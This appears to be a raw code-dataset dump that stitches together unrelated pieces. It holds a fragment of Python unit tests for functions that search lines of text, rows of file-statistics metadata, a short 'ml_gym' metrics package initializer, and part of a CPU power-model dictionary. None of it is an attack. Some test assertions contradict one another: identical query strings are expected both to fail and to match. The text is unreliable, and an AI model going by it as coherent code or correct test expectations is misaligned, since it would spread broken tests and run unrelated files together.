self.assertEqual(lines.first_occurrence(self.teststr, 'This'),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, 'another'),
(2, 'This is another line after a space'))
self.assertEqual(lines.first_occurrence(self.teststr, 'This is a line'),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, 'This is a lines'),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, 'This is another line after a space'),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, 'This is another line after a space'),
(2, 'This is another line after a space'))
self.assertEqual(lines.first_occurrence(self.teststr, 'blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.first_occurrence(self.teststr, 'blah blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.first_occurrence(self.teststr, '6'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, '3'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, '738.9'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, '(738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' (738.9) '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, '!'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' !'),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' !and'),
(6,'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.first_occurrence(self.teststr, ' ! '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, ' some text '),
notfound)
self.assertEqual(lines.first_occurrence(self.teststr, ' some text. '),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.first_occurrence(self.teststr, 'HEADER'),
(10, 'HEADER'))
self.assertEqual(lines.first_occurrence(self.teststr, 'HEADER2'),
(22, 'HEADER2'))
self.assertEqual(lines.first_occurrence(self.teststr, ' '),
(0, 'This is a line.'))
self.assertEqual(lines.first_occurrence(self.teststr, '\n'),
notfound)
self.assertEqual(lines.first_occurrence(self.file_as_string, 'TOTAL ACTIVITY EXCLUDING TRITIUM'),
(83, 'TOTAL ACTIVITY EXCLUDING TRITIUM 1.45396E+07 Bq'))
def test_last_occurrence(self):
notfound = (-1, '')
self.assertEqual(lines.last_occurrence(self.teststr, 'This'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'another'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'This is a line'),
(0, 'This is a line.'))
self.assertEqual(lines.last_occurrence(self.teststr, 'This is a lines'),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, 'This is another line after a space'),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, 'This is another line after a space'),
(2, 'This is another line after a space'))
self.assertEqual(lines.last_occurrence(self.teststr, 'blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.last_occurrence(self.teststr, 'blah blah'),
(8, 'blah blah 6 4 dajsl 2.3'))
self.assertEqual(lines.last_occurrence(self.teststr, '6'),
(26, 'and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds'))
self.assertEqual(lines.last_occurrence(self.teststr, '3'),
(26, 'and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds'))
self.assertEqual(lines.last_occurrence(self.teststr, '738.9'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, '(738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9)'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' (738.9) '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, '!'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' !'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' !and'),
(6,
'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, ' ! '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, ' some text '),
notfound)
self.assertEqual(lines.last_occurrence(self.teststr, ' some text. '),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
self.assertEqual(lines.last_occurrence(self.teststr, 'HEADER'),
(22, 'HEADER2'))
self.assertEqual(lines.last_occurrence(self.teststr, 'HEADER2'),
(22, 'HEADER2'))
self.assertEqual(lines.last_occurrence(self.teststr, ' '),
(27, ''))
self.assertEqual(lines.last_occurrence(self.teststr, '\n'),
notfound)
def test_next_occurrence(self):
notfound = (-1, '')
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 10),
(10, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 11),
(16, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 16),
(16, 'HEADER'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 17),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER', 22),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 22),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 0),
(22, 'HEADER2'))
self.assertEqual(lines.next_occurrence(self.teststr, 'HEADER2', 23),
notfound)
self.assertEqual(lines.next_occurrence(self.teststr, '3'),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 1),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 3),
(3, 'Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)'))
self.assertEqual(lines.next_occurrence(self.teststr, '3', 4),
(6, 'Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)'))
| 58.711246 | 130 | 0.587596 | 2,436 | 19,316 | 4.542282 | 0.052545 | 0.14216 | 0.244013 | 0.094442 | 0.941347 | 0.935653 | 0.92535 | 0.893538 | 0.849435 | 0.790239 | 0 | 0.078752 | 0.261752 | 19,316 | 328 | 131 | 58.890244 | 0.697195 | 0.002433 | 0 | 0.503333 | 0 | 0.096667 | 0.230186 | 0 | 0 | 0 | 0 | 0 | 0.48 | 1 | 0.026667 | false | 0 | 0.013333 | 0 | 0.043333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6d522cd09b0b652b5767872b2ae8b5943d8dfa13 | 187 | py | Python | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | ml_gym/metrics/__init__.py | olliethomas/ml-fairness-gym | adaa878596d3ce7dc0ee821f53f99cdf0cd2ef5f | [
"Apache-2.0"
] | null | null | null | from .distribution_comparison_metrics import *
from .error_metrics import *
from .infectious_disease_metrics import *
from .lending_metrics import *
from .value_tracking_metrics import *
| 31.166667 | 46 | 0.839572 | 23 | 187 | 6.478261 | 0.478261 | 0.436242 | 0.456376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106952 | 187 | 5 | 47 | 37.4 | 0.892216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ed93475a415670577593dc5509cef455062c96ff | 68,608 | py | Python | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/cmp_astarlbmtontoh264ref/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0693166,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.257133,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.486923,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.274652,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.475598,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.272769,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.02302,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.196831,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.05766,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0919902,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00995635,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0933703,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0736333,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.185361,
'Execution Unit/Register Files/Runtime Dynamic': 0.0835897,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.244611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.612037,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.38116,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00116337,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00116337,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00103021,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000408068,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105775,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0044147,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0105496,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0707856,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.50257,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.165687,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.24042,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.94295,
'Instruction Fetch Unit/Runtime Dynamic': 0.491856,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0968341,
'L2/Runtime Dynamic': 0.0531791,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.15836,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.04603,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0621566,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0621566,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.45307,
'Load Store Unit/Runtime Dynamic': 1.41473,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.153268,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.306535,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0543952,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0558393,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.279953,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0271923,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.532491,
'Memory Management Unit/Runtime Dynamic': 0.0830316,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 21.6447,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.320934,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0179061,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.136921,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.475761,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.89971,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0211686,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.219315,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.148635,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.27234,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.439274,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.221731,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.933346,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.288691,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.63013,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0280803,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114232,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
